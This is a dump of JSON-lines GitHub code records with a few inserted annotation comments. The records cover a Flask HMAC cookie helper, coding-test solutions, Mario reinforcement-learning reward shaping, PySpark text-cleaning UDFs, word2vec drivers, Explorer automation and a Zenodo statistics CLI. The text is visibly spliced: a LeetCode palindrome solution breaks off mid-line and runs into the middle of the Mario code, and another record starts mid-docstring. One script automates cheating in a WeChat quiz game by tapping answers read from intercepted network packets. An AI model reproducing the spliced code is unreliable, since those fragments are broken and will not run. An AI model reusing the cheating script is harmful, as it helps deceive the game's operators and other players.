value='')\n\t\tresp.set_cookie(key='nickname', value='')\n\t\treturn self.render(resp)\n\n\tdef is_valid_cookies(self):\n\t\ttry:\n\t\t\tcookies = request.cookies\n\t\t\tuid_and_digest = cookies.get('uid')\n\t\t\tusername = cookies.get('username')\n\t\t\treturn check_secure_cookies(uid_and_digest, username)\n\t\texcept Exception as e:\n\t\t\treturn False\n\n\tdef is_admin(self):\n\t\tusername = self.get_username()\n\t\tif username == admin_username:\n\t\t\treturn True\n\t\treturn False\n\n\tdef get_username(self):\n\t\ttry:\n\t\t\tcookies = request.cookies\n\t\t\tusername = cookies.get('username')\n\t\t\treturn username\n\t\texcept Exception as e:\n\t\t\treturn ''\n\n\tdef redirect_to_target(self, target='/'):\n\t\treturn self.render(redirect(target))\n\n# DK is the generated derived key\n# A derived key is a key, which may be calculated (derived) by a well-defined algorithm, usually referred to as a key derivation function, from an input consisting of public as well as secret data (e.g., a master key or primary key).\nhkey = 'dk_Huygens'.encode()\ndef make_secure_cookie(uid, username):\n\tmsg = uid + username\n\tdigest = hmac.new(hkey, msg.encode(), 'sha256').hexdigest()  # an explicit digestmod is required on Python 3.8+\n\tuid_and_digest = '%s|%s' % (uid, digest)\n\treturn uid_and_digest\n\ndef check_secure_cookies(uid_and_digest, username):\n\tif uid_and_digest:\n\t\tuid = uid_and_digest.split('|')[0]\n\t\tus_uid_and_digest = make_secure_cookie(uid, username)\n\t\t# constant-time comparison of the two signed values\n\t\treturn hmac.compare_digest(uid_and_digest, us_uid_and_digest)\n\telse:\n\t\treturn False","repo_name":"USTC-Titanic/webapp","sub_path":"page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
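# --- Annotation for the page.py record above (not a dataset record). ---
# A standalone round-trip sketch of its signed-cookie scheme: the uid travels
# next to an HMAC of uid+username, so tampering with either field invalidates
# the cookie. sha256 is an assumption here; names mirror the record.
import hmac

hkey = b'dk_Huygens'

def make_secure_cookie(uid, username):
    digest = hmac.new(hkey, (uid + username).encode(), 'sha256').hexdigest()
    return '%s|%s' % (uid, digest)

def check_secure_cookies(uid_and_digest, username):
    if not uid_and_digest:
        return False
    uid = uid_and_digest.split('|')[0]
    # compare_digest runs in constant time, so timing reveals nothing
    return hmac.compare_digest(uid_and_digest, make_secure_cookie(uid, username))

cookie = make_secure_cookie('42', 'alice')
assert check_secure_cookies(cookie, 'alice')
assert not check_secure_cookies(cookie, 'bob')  # wrong username fails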
+{"seq_id":"22740911389","text":"\nn = int(input())\ngraph = [list(map(int, input().split())) for _ in range(n)]\nvisited = [False]*n\nans = []\nres = 1000000\n\n\n# Split the n players in ans into two halves; a team's score is the sum of\n# graph[i][j] over all ordered pairs inside the team. Track the minimum difference.\ndef dfs(depth):\n    global res\n    if depth == n:\n        half = n // 2\n        t1, t2 = 0, 0\n        for i in range(half):\n            for j in range(half):\n                if i != j:\n                    t1 += graph[ans[i]][ans[j]]\n        for i in range(half, n):\n            for j in range(half, n):\n                if i != j:\n                    t2 += graph[ans[i]][ans[j]]\n        res = min(res, abs(t1 - t2))\n        return\n    for i in range(n):\n        if visited[i]:\n            continue\n        visited[i] = True\n        ans.append(i)\n        dfs(depth+1)\n        visited[i] = False\n        ans.pop()\n\n\ndfs(0)\nprint(res)\n","repo_name":"LEEHYUNDONG/codingTest","sub_path":"codingTest_python/BOJ/BOJ_startLinkTeam.py","file_name":"BOJ_startLinkTeam.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"22872223799","text":"#https://leetcode.com/problems/palindrome-partitioning/\n#time O(2^N) space O(N*2^N)\nclass Solution:\n    def partition(self, s: str) -> List[List[str]]:\n        def isPalindrome(cur):\n            i = 0\n            j = len(cur)-1\n            while i 100:\n                reward += 300.0\n            self._currentX = info['x']\n\n\n        #punishes blocked agent\n        if info['blocked'] == 5:\n            reward -= 200.0\n\n\n        #punishes stay quiet\n        if info['timer1'] == 9:\n            self._currentX = info['x']\n            self._aux = False\n\n        if self._timer:\n            self._start = time.time()\n            self._currentX = info['x']\n            self._timer = False\n\n        if time.time() > self._start + 5:\n            if (info['x'] - self._currentX) < 60:\n                reward -= 350.0\n            self._timer = True\n\n        #rewards when grab bonus flag\n        if info['endOfLevel']:\n            if info['finalFlag'] == self._finalFlag:\n                reward += 7000.0\n            else:\n                reward += 4500.0\n\n            t = info['timer100'] * 10 + info['timer10']\n            if t > 25:\n                reward += 10000.0\n\n        self.env.render()\n\n        return state, reward / 100.0, done, info\n","repo_name":"g-rm/Super-Mario","sub_path":"mario_util.py","file_name":"mario_util.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
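# --- Annotation for the BOJ_startLinkTeam record above (not a dataset record).
# Enumerating itertools.combinations of one team (instead of all n! permutations)
# visits each split of the players far fewer times and is dramatically cheaper:
from itertools import combinations

def min_diff(n, graph):
    players = range(n)
    best = float("inf")
    for team1 in combinations(players, n // 2):
        team2 = [p for p in players if p not in team1]
        s1 = sum(graph[i][j] for i in team1 for j in team1 if i != j)
        s2 = sum(graph[i][j] for i in team2 for j in team2 if i != j)
        best = min(best, abs(s1 - s2))
    return best

# small made-up cost matrix; the best split is {0,3} vs {1,2} with difference 0
assert min_diff(4, [[0, 1, 2, 3], [4, 0, 5, 6], [7, 1, 0, 2], [3, 4, 5, 0]]) == 0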
Defaults to \"\".\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"@[\\S]+\", sub_token, text)\n\n\ndef sub_hashtags(text: str, sub_token=None) -> str:\n \"\"\"Substitute hashtags (starts with '#' symbol) with a custom token.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute for a hashtag. If None, then function substitutes hashtag with the corresponding word. Defaults to None.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"(#)([\\S]+)\", sub_token if sub_token is not None else r\"\\2\", text)\n\n\ndef sub_unicode(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute Unicode symbols.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"[^\\u0000-\\u007F]+\", sub_token, text)\n\n\ndef sub_sepr(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute common line separation symbols (`\\\\n`, `\\\\r`, `\\\\t`).\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"[\\n\\r\\t]+\", sub_token, text)\n\n\ndef sub_punc(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute punctuation symbols:\n ```['!', '\"', '#', '$', '%', '&', '(', ')', '*', '+', ',', '.', '/', ':', ';', '<', '=', '>', '?', '@', '\\\\', '^', '_', '`', '{', '|', '}', '~', '[', ']', '-']```\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r'[!\"#$%&\\(\\)\\*\\+,\\./:;<=>?@\\\\^_`{|}~\\[\\]-]+', sub_token, text)\n\n\ndef sub_url(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute web resource link (URL) with a custom token.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ''.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(\n r\"^https?:\\\\/\\\\/(?:www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{1,256}\\\\.[a-zA-Z0-9()]{1,6}\\\\b(?:[-a-zA-Z0-9()@:%_\\\\+.~#?&\\\\/=]*)$\",\n sub_token,\n text,\n )\n\n\ndef sub_numwords(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute words that contain digits.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ''.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"\\b(\\w)*(\\d)(\\w)*\\b\", sub_token, text)\n\n\ndef sub_stopwords(text: str, sub_token=\"\") -> str:\n \"\"\"Substitute English stopwords.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): A custom token to substitute. Defaults to ''.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return \" \".join(\n [word if word not in STOP_WORDS else sub_token for word in text.split(\" \")]\n )\n\n\ndef sub_space(text: str, sub_token=\" \") -> str:\n \"\"\"Substitute 2+ adjacent space characters with a single space character.\n\n Args:\n text (str): Input text string to process.\n sub_token (str, optional): An alternative to a single space character. 
Defaults to ' '.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return re.sub(r\"[ ]+\", sub_token, text)\n\n\ndef iter_proc(text: str, steps=[]) -> str:\n \"\"\"Iterative preprocessing of a text data.\n\n Args:\n text (str): Input text string to process.\n steps (list, optional): User defined processing steps of a `Callable` type. Defaults to [].\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n for step in steps:\n text = step(text)\n\n return text\n\n\ndef social_proc(text: str) -> str:\n \"\"\"Preprocess text string related to a social media (e.g. a blog post): normalize and remove URLs, usernames, hashtags, separation symbols, words with numbers, and redundant spaces.\n\n Args:\n text (str): Input text string to process.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return iter_proc(\n text,\n steps=[\n lambda text: text.lower(),\n lambda text: sub_url(text),\n lambda text: sub_usertags(text),\n lambda text: sub_hashtags(text),\n lambda text: sub_sepr(text),\n lambda text: sub_numwords(text),\n lambda text: sub_space(text),\n lambda text: text.strip(),\n ],\n )\n\n\ndef full_proc(text: str) -> str:\n \"\"\"Preprocess text with all available pipelines.\n\n Args:\n text (str): Input text string to process.\n\n Returns:\n str: Processed input string.\n \"\"\"\n\n return iter_proc(\n text,\n steps=[\n lambda text: text.lower(),\n lambda text: sub_url(text),\n lambda text: sub_usertags(text),\n lambda text: sub_hashtags(text),\n lambda text: sub_unicode(text),\n lambda text: sub_sepr(text),\n lambda text: sub_punc(text),\n lambda text: sub_numwords(text),\n lambda text: sub_stopwords(text),\n lambda text: sub_space(text),\n lambda text: text.strip(),\n ],\n )\n\n\ndef cosine_sim(x: np.array, y: np.array) -> np.array:\n \"\"\"Compute a cosine similarity between `x` and `y` vectors: `cos(x, y) = x @ y / (||x|| * ||y||)`\n\n Example:\n >>> cosine_sim(np.array([1.0, 1.0, 1.0, 1.0]), np.array([0.5, -3.0, 0.25, -1.0]))\n -0.5060243137049899\n\n Args:\n x (np.array): An input vector.\n y (np.array): Another input vector.\n\n Returns:\n np.array: Cosine similarity vector.\n \"\"\"\n\n return x @ y / (la.norm(x) * la.norm(y))\n\n\n# Preprocessing UDFs\nstrip_udf = udf(lambda text: text.strip(), StringType())\nnormalise_udf = udf(lambda text: text.lower(), StringType())\nsub_url_udf = udf(lambda text: sub_url(text), StringType())\nsub_usertags_udf = udf(lambda text: sub_usertags(text), StringType())\nsub_hashtags_udf = udf(lambda text: sub_hashtags(text), StringType())\nsub_unicode_udf = udf(lambda text: sub_unicode(text), StringType())\nsub_sepr_udf = udf(lambda text: sub_sepr(text), StringType())\nsub_punc_udf = udf(lambda text: sub_punc(text), StringType())\nsub_numwords_udf = udf(lambda text: sub_numwords(text), StringType())\nsub_stopwords_udf = udf(lambda text: sub_stopwords(text), StringType())\nsub_space_udf = udf(lambda text: sub_space(text), StringType())\n\n# Metrics UDFs\ncosine_sim_udf = udf(lambda x, y: cosine_sim(x, y), FloatType())\nwordlen_udf = udf(lambda text: len(text.split(\" \")), IntegerType())\ncharlen_udf = udf(lambda text: len(text), IntegerType())\n\n# Custom UDFs\nsocial_proc_udf = udf(lambda text: social_proc(text), StringType())\nfull_proc_udf = udf(lambda text: full_proc(text), StringType())\n","repo_name":"antonAce/pyspark-env","sub_path":"util/nlp/udf.py","file_name":"udf.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} 
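# --- Annotation for the udf.py record above (not a dataset record). ---
# Verifying the cosine_sim docstring example with plain numpy:
# cos(x, y) = x @ y / (||x|| * ||y||).
import numpy as np
import numpy.linalg as la

x = np.array([1.0, 1.0, 1.0, 1.0])
y = np.array([0.5, -3.0, 0.25, -1.0])
print(x @ y / (la.norm(x) * la.norm(y)))  # -0.5060243137049899, as documented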
+{"seq_id":"20565201872","text":"# SPDX-License-Identifier: LGPL-3.0-or-later\n\"\"\"Root of the mdpukit package, exposes all public classes and submodules.\"\"\"\n\ntry:\n from importlib import (\n metadata,\n )\nexcept ImportError: # for Python<3.8\n import importlib_metadata as metadata\n\nimport mdpukit.utils.network as network\n\nfrom . import (\n cluster,\n descriptor,\n fit,\n loss,\n mdpu,\n utils,\n)\nfrom .env import (\n set_mkl,\n)\nfrom .infer import (\n DeepEval,\n DeepPotential,\n)\n\nset_mkl()\n\ntry:\n from ._version import version as __version__\nexcept ImportError:\n from .__about__ import (\n __version__,\n )\n\n# load third-party plugins\ntry:\n eps = metadata.entry_points(group=\"mdpukit\")\nexcept TypeError:\n eps = metadata.entry_points().get(\"mdpukit\", [])\nfor ep in eps:\n ep.load()\n\n__all__ = [\n \"__version__\",\n \"descriptor\",\n \"fit\",\n \"loss\",\n \"utils\",\n \"cluster\",\n \"network\",\n \"DeepEval\",\n \"DeepPotential\",\n \"mdpu\",\n]\n","repo_name":"LiuGroupHNU/md-data","sub_path":"code/mdpukit/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36085953112","text":"from aoc_components.input_getter import get_my_input\nfrom typing import Dict, Tuple\nimport itertools\nfrom collections import defaultdict\n\ninp = get_my_input(__file__)\n\n\ndef get_total_likings(sitting: tuple, likings: Dict[Tuple[str, str], int]):\n c = 0\n s = len(sitting)\n for i in range(s-1):\n a = sitting[i]\n b = sitting[i+1]\n c += likings[(a, b)] + likings[(b, a)]\n a = sitting[s-1]\n b = sitting[0]\n c += likings[(a, b)] + likings[(b, a)]\n return c\n\n\nif __name__ == \"__main__\":\n likings = defaultdict(int)\n people = set()\n for line in inp.splitlines():\n x, B = line.split(\" happiness units by sitting next to \")\n B = B.strip(\".\")\n A, g = x.split(\" would \")\n G, V = g.split(\" \")\n V = int(V)\n if G == \"lose\":\n V = 0-V\n likings[(A, B)] = int(V)\n\n for dist in likings:\n people.add(dist[0])\n people.add(dist[1])\n\n def get():\n return max(\n (get_total_likings(r, likings)\n for r\n in itertools.permutations(people))\n )\n\n print(get())\n people.add(\"Me\")\n print(get())\n","repo_name":"GsakuL/AdventOfCode","sub_path":"2015/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70586058064","text":"from django import template\nfrom django.core import urlresolvers\n\n__author__ = 'Pierre Rodier | pierre@buffactory.com'\n\nregister = template.Library()\n\n\ndef current_url_equals(context, url_name, **kwargs):\n resolved = False\n try:\n resolved = urlresolvers.resolve(context.get('request').path)\n except:\n pass\n matches = resolved and resolved.url_name == url_name\n if matches and kwargs:\n for key in kwargs:\n kwarg = kwargs.get(key)\n resolved_kwarg = resolved.kwargs.get(key)\n\n if kwarg:\n # for the comparison of same type url arg d+ w+\n kwarg = unicode(kwarg)\n\n if not resolved_kwarg or kwarg != resolved_kwarg:\n return False\n return matches\n\n\n@register.simple_tag(takes_context=True)\ndef current(context, url_name, return_value=' active', **kwargs):\n matches = current_url_equals(context, url_name, **kwargs)\n\n return return_value if matches else 
''\n","repo_name":"jisson/sketchfab_backend_test","sub_path":"sketchfab/templatetags/sketchfab_extras.py","file_name":"sketchfab_extras.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39009878120","text":"from word2vec_base import Word2VecCPU\nfrom word2vec_base_th import Word2VecGPU\nfrom word2vec_freq_word_sampling import Word2VecFreqWordSamplingCPU\nfrom word2vec_freq_word_sampling_th import Word2VecFreqWordSamplingGPU\nfrom word2vec_freqwords_phrases import Word2VecLearnPhraseSampleFreqWordCPU\nfrom word2vec_freqwords_phrases_th import Word2VecLearnPhraseSampleFreqWordGPU\nfrom word2vec_negative_sampling_np import Word2VecNegSamplingCPU\nfrom word2vec_negative_sampling_th import Word2VecNegSamplingGPU\nimport os\nimport torch as th\n\n\nif __name__ == '__main__':\n gpu_models = [\n Word2VecLearnPhraseSampleFreqWordGPU, Word2VecFreqWordSamplingGPU, Word2VecGPU, Word2VecNegSamplingGPU\n ]\n\n cpu_models = [\n Word2VecCPU, Word2VecFreqWordSamplingCPU, Word2VecLearnPhraseSampleFreqWordCPU, Word2VecNegSamplingCPU\n ]\n\n th.multiprocessing.set_start_method('spawn')\n th.backends.cuda.matmul.allow_tf32 = True\n th.backends.cudnn.allow_tf32 = True\n\n dataset1_f = os.path.join(os.getcwd() + \"/interview_ds.txt\")\n dataset2_f = os.path.join(os.getcwd() + \"/interview_ds_2.txt\")\n\n with open(dataset1_f, \"r\") as f:\n corpus1 = f.read()\n with open(dataset2_f, \"r\") as f:\n corpus2 = f.read()\n\n corpus = corpus1 + corpus2\n # gpu_models = [Word2VecNegSamplingGPU]\n\n for word2vec_model in gpu_models[:-1]:\n model = word2vec_model(corpus1[:int(1e6)], embedding_dim=100)\n print(f\"Running model {model}\")\n model.train(3)\n predictions = model.predict(\"puppy\", 3)\n print(predictions, \" are predictiosn for word \", \"puppy\")\n print(50*\"-\")\n","repo_name":"debasishdebs/LLM-Finetuning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36308695731","text":"# _*_ coding:utf-8 _*_\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport time\nimport json\nimport os\n\n# option0是错号的坐标,option1是对号的坐标\nconf = {\n \"option0\": {\n \"x\": 810,\n \"y\": 1650,\n },\n \"option1\": {\n \"x\": 270,\n \"y\": 1650,\n }\n}\n\n\n# 点击相应坐标\ndef adb_tap(option):\n os.system('adb shell input tap {0} {1}'.format(conf[option]['x'], conf[option]['y']))\n\n\n# 顺次点击40道题的答案\ndef read_question(response):\n global start\n global num\n # 每次抓包可以得到40个答案\n for i in range(40):\n # 游戏开始有个开场动画,需要等待一下再点击\n if start:\n start = False\n time.sleep(2)\n is_true = response[str(i)]['is_true']\n adb_tap('option' + str(is_true))\n if i != 39:\n time.sleep(sleep_time)\n num += 1\n print(\"第{}道题, {}\".format(num, is_true))\n\n\n# 监控json文件变化\nclass FileEventHandler(FileSystemEventHandler):\n def __init__(self):\n FileSystemEventHandler.__init__(self)\n\n def on_created(self, event):\n if os.path.exists(path):\n with open(path) as f:\n # 获得json,解析,删除json\n time.sleep(sleep_time)\n response = json.load(f)\n f.close()\n os.remove(path)\n read_question(response)\n\n\nif __name__ == \"__main__\":\n # 更改!保存的json文件\n path = 'D:\\ADB\\question\\jjds.iwillgo.cn\\index\\index_one_nine_six\\sprint_game'\n sleep_time = 0.05\n start = True\n # 答题数目\n num = 0\n # 判断一下是否有之前残存的json,有就先删除\n if os.path.exists(path):\n os.remove(path)\n \"\"\"\n 
+{"seq_id":"36308695731","text":"# _*_ coding:utf-8 _*_\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\nimport time\nimport json\nimport os\n\n# option0 holds the screen coordinates of the 'wrong' button, option1 those of the 'right' button\nconf = {\n    \"option0\": {\n        \"x\": 810,\n        \"y\": 1650,\n    },\n    \"option1\": {\n        \"x\": 270,\n        \"y\": 1650,\n    }\n}\n\n\n# Tap the given screen coordinates via adb\ndef adb_tap(option):\n    os.system('adb shell input tap {0} {1}'.format(conf[option]['x'], conf[option]['y']))\n\n\n# Tap the answers to the 40 questions one after another\ndef read_question(response):\n    global start\n    global num\n    # each captured packet yields the answers to all 40 questions\n    for i in range(40):\n        # the game opens with an intro animation, so wait a moment before the first tap\n        if start:\n            start = False\n            time.sleep(2)\n        is_true = response[str(i)]['is_true']\n        adb_tap('option' + str(is_true))\n        if i != 39:\n            time.sleep(sleep_time)\n        num += 1\n        print(\"Question {}: {}\".format(num, is_true))\n\n\n# Watch the captured JSON file for changes\nclass FileEventHandler(FileSystemEventHandler):\n    def __init__(self):\n        FileSystemEventHandler.__init__(self)\n\n    def on_created(self, event):\n        if os.path.exists(path):\n            with open(path) as f:\n                # read the JSON, parse it, then delete the file\n                time.sleep(sleep_time)\n                response = json.load(f)\n                f.close()\n                os.remove(path)\n                read_question(response)\n\n\nif __name__ == \"__main__\":\n    # Change this! Path of the saved JSON file\n    path = 'D:\\\\ADB\\\\question\\\\jjds.iwillgo.cn\\\\index\\\\index_one_nine_six\\\\sprint_game'\n    sleep_time = 0.05\n    start = True\n    # number of questions answered so far\n    num = 0\n    # if a leftover JSON file from a previous run exists, delete it first\n    if os.path.exists(path):\n        os.remove(path)\n    \"\"\"\n    watchdog is built around the observer pattern, with three main roles: the observer, the event_handler, and the watched directory.\n    The three are independent of each other; observer.schedule is what ties them together.\n    The observer keeps calling platform-dependent code to detect changes in the watched directory and notifies the event_handler when a change is found.\n    \"\"\"\n    observer = Observer()\n    event_handler = FileEventHandler()\n    # Change this! Directory that contains the saved JSON file\n    observer.schedule(event_handler, r'D:\\\\ADB\\\\question\\\\jjds.iwillgo.cn\\\\index\\\\index_one_nine_six\\\\\\\\', True)\n    print('The assistant is running, please start the game')\n    observer.start()\n    try:\n        while True:\n            time.sleep(0)\n    except KeyboardInterrupt:\n        observer.stop()\n    observer.join()\n","repo_name":"MrMrShao/WechatGameAutoClick","sub_path":"get_answer.py","file_name":"get_answer.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"69840121744","text":"import os\nfrom os.path import basename\nfrom time import sleep\n\nimport win32gui\n\nfrom p0_backend.lib.ableton.interface.coords import Coords, RectCoords\nfrom p0_backend.lib.ableton.interface.pixel import (\n    get_coords_for_color,\n)\nfrom p0_backend.lib.ableton.interface.pixel_color_enum import PixelColorEnum\nfrom p0_backend.lib.decorators import retry\nfrom p0_backend.lib.errors.Protocol0Error import Protocol0Error\nfrom p0_backend.lib.mouse.mouse import click, drag_to, move_to\nfrom p0_backend.lib.process import kill_window_by_criteria\nfrom p0_backend.lib.window.window import focus_window, move_window, window_contains_coords\n\n\ndef open_explorer(file_path: str) -> int:\n    assert os.path.exists(file_path), f\"'{file_path}' does not exist\"\n\n    click((0, 500))  # move the cursor from the explorer window position\n    folder_name = basename(os.path.split(file_path)[0])\n    try:\n        handle = focus_window(folder_name)\n        sleep(0.1)\n        return handle\n    except (AssertionError, Protocol0Error):\n        os.system(f\"explorer.exe /select, {file_path}\")\n        handle = retry(50, 0.1)(focus_window)(name=folder_name)\n        sleep(0.5)\n\n        return handle\n\n\n@retry(2, 0)\ndef _open_explorer_until_selected(file_path: str, bbox: RectCoords, dest_coords: Coords):\n    handle = open_explorer(file_path)\n\n    window_bbox = win32gui.GetWindowRect(handle)\n\n    # move window if it's in the way\n    if window_contains_coords(window_bbox, dest_coords):\n        move_window(handle, bbox)\n        window_bbox = bbox\n\n    x, y, x2, y2 = window_bbox\n\n    try:\n        return retry(3, 0)(get_coords_for_color)(\n            [\n                PixelColorEnum.EXPLORER_SELECTED_ENTRY,\n                PixelColorEnum.EXPLORER_SELECTED_ENTRY_LIGHT,\n            ],\n            bbox=(x + 200, y + 200, x2, y2),\n        )\n    except Protocol0Error as e:\n        close_samples_windows()\n        raise e\n\n\ndef drag_file_to(\n    file_path: str,\n    dest_coords: Coords,\n    bbox: RectCoords,\n    drag_duration=0.5,\n    close_window=True,\n):\n    x, y = _open_explorer_until_selected(file_path, bbox, dest_coords)\n\n    move_to((x, y + 10))\n    drag_to(dest_coords, duration=drag_duration)\n\n    if close_window:\n        folder_name = basename(os.path.split(file_path)[0])\n\n        kill_window_by_criteria(name=folder_name)\n\n\ndef close_samples_windows():\n    kill_window_by_criteria(name=\"Recorded\")\n    kill_window_by_criteria(name=\"Freeze\")\n\n\ndef close_explorer_window(title: str):\n    kill_window_by_criteria(name=title)\n","repo_name":"lebrunthibault/protocol0","sub_path":"p0_backend/p0_backend/lib/explorer.py","file_name":"explorer.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
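# --- Annotation for the get_answer.py record above (not a dataset record). ---
# The smallest runnable form of the observer pattern its docstring describes:
# an Observer polls platform-specific file-system events for a directory and
# dispatches each change to the handler's callbacks.
import time
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler

class PrintHandler(FileSystemEventHandler):
    def on_created(self, event):
        print("created:", event.src_path)

observer = Observer()
observer.schedule(PrintHandler(), path=".", recursive=False)
observer.start()
try:
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    observer.stop()
observer.join()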
+{"seq_id":"43612083537","text":"import csv\nimport glob\nimport re\nimport sys\nfrom datetime import datetime as dt\n\nimport click\nfrom dateutil.parser import parse as dateutil_parse\nfrom flask.cli import with_appcontext\nfrom invenio_stats.cli import stats\nfrom invenio_stats.proxies import current_stats\nfrom six.moves import filter, map\nfrom six.moves.urllib.parse import urlparse\n\nfrom zenodo.modules.stats.tasks import update_record_statistics\nfrom zenodo.modules.stats.utils import chunkify, \\\n    extract_event_record_metadata, fetch_record, fetch_record_file\n\nPY3 = sys.version_info[0] == 3\n\n\ndef _verify_date(ctx, param, value):\n    if value:\n        dateutil_parse(value)\n        return value\n\n\ndef parse_record_url(url):\n    \"\"\"Parses a recid and filename from a record-like URL.\"\"\"\n    record_url = urlparse(url)\n    assert record_url.hostname.lower().endswith('zenodo.org'), 'non-Zenodo url'\n    match = re.match(\n        # matches \"/record/(123)\", \"/record/(123)/export\", etc\n        r'^\\/record\\/(?P<recid>\\d+)'\n        # matches \"/record/(123)/files/(some.pdf)\"\n        r'(?:\\/files\\/(?P<filename>.+)$)?',\n        record_url.path).groupdict()\n    return match.get('recid'), match.get('filename')\n\n\ndef build_common_event(record, data):\n    \"\"\"Build common fields of a stats event from a record and request data.\"\"\"\n    return dict(\n        timestamp=dt.utcfromtimestamp(float(data['timestamp'])).isoformat(),\n        pid_type='recid',\n        pid_value=str(record.get('recid')),\n        referrer=data['referrer'],\n        ip_address=data['ipAddress'],\n        user_agent=data['userAgent'],\n        user_id=None,\n        **extract_event_record_metadata(record)\n    )\n\n\ndef build_record_view_event(data):\n    \"\"\"Build a 'record-view' event from request data.\"\"\"\n    try:\n        recid, _ = parse_record_url(data['url'])\n        assert recid, 'no recid in url'\n        _, record = fetch_record(recid)\n    except Exception:\n        return\n\n    return build_common_event(record, data)\n\n\ndef build_file_download_event(data):\n    \"\"\"Build a 'file-download' event from request data.\"\"\"\n    try:\n        recid, filename = parse_record_url(data['url'])\n        assert recid and filename, 'no recid and filename in url'\n        _, record = fetch_record(recid)\n        obj = fetch_record_file(recid, filename)\n    except Exception:\n        return\n\n    return dict(\n        bucket_id=str(obj.bucket_id),\n        file_id=str(obj.file_id),\n        file_key=obj.key,\n        size=obj.file.size,\n        **build_common_event(record, data)\n    )\n\n\nEVENT_TYPE_BUILDERS = {\n    'record-view': build_record_view_event,\n    'file-download': build_file_download_event,\n}\n\n\n@stats.command('import')\n@click.argument('event-type', type=click.Choice(EVENT_TYPE_BUILDERS.keys()))\n@click.argument('csv-dir', type=click.Path(file_okay=False, resolve_path=True))\n@click.option('--chunk-size', '-s', type=int, default=100)\n@with_appcontext\ndef import_events(event_type, csv_dir, chunk_size):\n    r\"\"\"Import stats events from a directory of CSV files.\n\n    Available event types: \"file-download\", \"record-view\"\n\n    The following columns should always be present:\n\n    \\b\n    - ipAddress\n    - userAgent\n    - url (\"https://zenodo.org/record/1234/files/article.pdf\")\n    - timestamp (1388506249)\n    - referrer (\"Google\", \"example.com\", etc)\n    \"\"\"\n    csv_files = glob.glob(csv_dir + '/*.csv')\n    with click.progressbar(csv_files, len(csv_files)) as csv_files_bar:\n        for csv_path in csv_files_bar:\n            with open(csv_path, 'r' if PY3 else 'rb') as fp:\n                reader = csv.DictReader(fp, delimiter=',')\n                events = filter(\n                    None, map(EVENT_TYPE_BUILDERS[event_type], reader))\n                for event_chunk in chunkify(events, chunk_size):\n                    current_stats.publish(event_type, event_chunk)\n    click.secho(\n        'Run the \"invenio_stats.tasks.process_events\" to index the events...',\n        fg='yellow')\n\n\n@stats.command('update-records')\n@click.option('--start-date', callback=_verify_date)\n@click.option('--end-date', callback=_verify_date)\n@click.option('--eager', '-e', is_flag=True)\n@with_appcontext\ndef update_records(start_date=None, end_date=None, eager=False):\n    \"\"\"Update records' statistics on ES.\"\"\"\n    if eager:\n        update_record_statistics.apply(\n            kwargs=dict(start_date=start_date, end_date=end_date), throw=True)\n        click.secho('Records sent for bulk indexing. Wait for the scheduled '\n                    'indexer or run `zenodo index run ...`', fg='yellow')\n    else:\n        update_record_statistics.delay(\n            start_date=start_date, end_date=end_date)\n        click.secho('Update records statistics task sent...', fg='yellow')\n","repo_name":"zenodo/zenodo","sub_path":"zenodo/modules/stats/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":847,"dataset":"github-code","pt":"47"}
